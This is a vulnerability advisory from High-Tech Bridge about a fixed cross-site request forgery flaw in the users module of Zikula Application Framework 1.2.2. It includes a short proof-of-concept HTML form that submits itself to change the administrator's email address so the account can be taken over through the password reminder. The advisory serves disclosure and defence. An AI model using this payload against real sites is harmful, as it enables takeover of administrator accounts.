Vulnerability ID: HTB22351 Reference: Product: Zikula Application Framework Vendor: Zikula Software Foundation Vulnerable Version: 1.2.2 and Probably Prior Versions Vendor Notification: 19 April 2010 Vulnerability Type: CSRF (Cross-Site Request Forgery) Status: Fixed by Vendor Risk level: Low Credit: High-Tech Bridge SA ( Vulnerability Details: The vulnerability exists due to failure in the "users" module to properly verify the source of HTTP request. User can perform CSRF attack and change the email of administrator. Then the user can use the password reminder system and get the administrator password on this email address. Successful exploitation of this vulnerability could result in a compromise of the application, modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form method="POST" action="http://host/index.php?module=users&func=updateemail" name="main"> <input type="hidden" name="newemail" value="test@xxxxxxxx"> <input type="hidden" name="submit" value=""> </form> <script> document.main.submit(); </script> Solution: Upgrade to the most recent verison